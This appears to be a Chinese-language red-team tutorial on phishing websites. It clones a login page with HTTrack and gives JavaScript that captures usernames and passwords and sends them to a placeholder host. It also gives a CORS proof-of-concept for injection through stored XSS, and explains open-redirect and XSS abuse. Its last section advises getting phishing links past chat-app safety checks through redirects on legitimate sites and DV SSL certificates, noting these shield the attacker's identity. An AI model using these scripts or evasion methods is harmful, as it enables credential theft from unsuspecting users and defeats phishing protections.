在红队攻击中，除漏洞以外最简洁高效的攻击方式无疑是钓鱼攻击，通过不同的钓鱼方式可达到不同的攻击效果，本次我会分享最常见的钓鱼手段之一的网站钓鱼技术，同时对可实现的攻击操作进行演示。

更多网站钓鱼实验科普，可前往无问社区查看http://www.wwlib.cn

本次我们会分为以下2个实验环节进行讲解，让各位了解钓鱼网站的克隆及克隆网页常见问题解决方式，以及钓鱼网站能通过哪些安全漏洞进行攻击和如何通过安全工具的URL审查：

1. 钓鱼网站的制作及利用场景
2. 通过安全检查的方式

一 钓鱼网站的制作及投递

作为网站钓鱼的先前步骤，制作钓鱼网站必然是最基本的一步，推荐使用的工具为HttTrack，他是一款免费的网站克隆工具，特点在于速度快且克隆的效果与原始网站相似度高。

以下是工具克隆效果，第一张图是克隆页面第二张图是原始网站，能看出相似度很高。

之后便是如何通过此页面获取用户的账号密码，关键点在于能够将请求包发送至我们指定的密码接收端，同时还需要保证数据包格式能被我们自定义，这里我们可以根据页面结构的特点从以下两种方式进行选择或者组合使用。

1. 直接修改form表单的action指向链接。
2. 创建js事件捕获用户输入内容，并将用户名密码发送至接收端。

以我们所创建的这个页面为例来进行演示。

在原始文件中，并没有看到action属性，但是在底部能看到请求包发送的js代码，程序会将用户名密码信息发送至/User/executeLogin路径下。

修改请求地址，抓包分析请求内容。

密码做了加密，说明当前的登录按钮绑定了事件，点击时加密密码并发送。

Js绑定事件依赖两种方式，标签属性绑定以及标签名称绑定，通常情况下都是采用的标签属性绑定，通过测试发现，删除lay-submit属性后密码将变为明文。

最后这个页面修改位置如下图所示：

我们也可以通过绑定新的js代码，将用户名密码发送至我们的接收端，示例代码如下：

 1. document.getElementById('hacker').addEventListener('click', function() {
 2.   var passwd = document.getElementsByName('passwd')[0].value;
 3.   var user = document.getElementsByName('user')[0].value;
 4.   
 5.   var xhr = new XMLHttpRequest();
 6.   xhr.open('POST', 'xxx.com/1.jsp', true);
 7.   xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
 8.   xhr.send('passwd=' + passwd + '&user=' + user);
 9. });  

钓鱼网站最常用到的漏洞是XSS、跨域（CORS）、任意URL重定向这三类漏洞。

反射型XSS漏洞可以通过直接向目标发送带有重定向xss代码的漏洞链接，使其跳转到我们伪造的钓鱼网站上，也可以外部引入js代码来重写页面属性使其正常请求发送至我们的账户数据接收端。

存储型XSS漏洞除了可以使用反射型XSS漏洞所支持的攻击手段外，还可以进行CORS攻击，如我们的目标网站存在跨域漏洞，则可以将跨域漏洞利用代码写入网页当中，持续获取用户敏感信息。

CORS漏洞需要搭配其他漏洞使用。

任意URL重定向可以让目标访问到我们构造的恶意网站中

需要注意的是上述除CORS漏洞以外并非只能是目标站点存在，也可以是任何第三方网站，下面主要演示一下CORS漏洞的利用效果，POC利用代码可以结合XSS漏洞插入到目标网站的任意位置，实现同域下的账号敏感信息获取。

利用前需要注意验证CORS漏洞是否存在

Poc利用代码，自行修改：

 1. <script type="text/javascript">
 2.         var xhr = new XMLHttpRequest();
 3.         xhr.open('GET', 'http://xxx.com/test.php', true);
 4.         xhr.withCredentials = true; 
 5.         xhr.onreadystatechange = function() {
 6.           if (xhr.readyState === 4 && xhr.status === 200) {
 7.             var response = xhr.responseText;
 8.             alert(response);
 9.           }
10.         };
11.         xhr.send();
12.  
13.     </script>
14.  

可将其通过存储型XSS写入到任意页面当中去，下图是我本地测试页面，实际攻击中可以使用<scrtip src=’xxx.com/xx.jsp’></script>进行引用。

当用户访问到我们构建的钓鱼页面后，即可获取用户账户信息。

二 通过安全检查的方式

通过安全检查有两种方案可以尝试，第一种是通过重定向，最为方便且效果较好，第二种则是申请https证书。

我们在QQ或者钉钉以及其他的社交平台中发送链接时，通信软件会对目标链接安全性进行检测，对于个人注册的网站且未设置https证书，其会给出，“安全性未知”或者问号标记，如网站有违规行为则还可能会给出危险提示。此时如果将网站追加到合法网站的重定向参数中即可绕过检测，为我们的钓鱼链接给出“安全网站”的提示。

而第二种申请SSL证书，我们可以通过申请DV SSL证书来实现对钓鱼网站的https处理，目前支持DV SSL证书的平台较多，其优势在于验证流程简单，无需验证所有者身份，所欲对于攻击者的个人保护较好。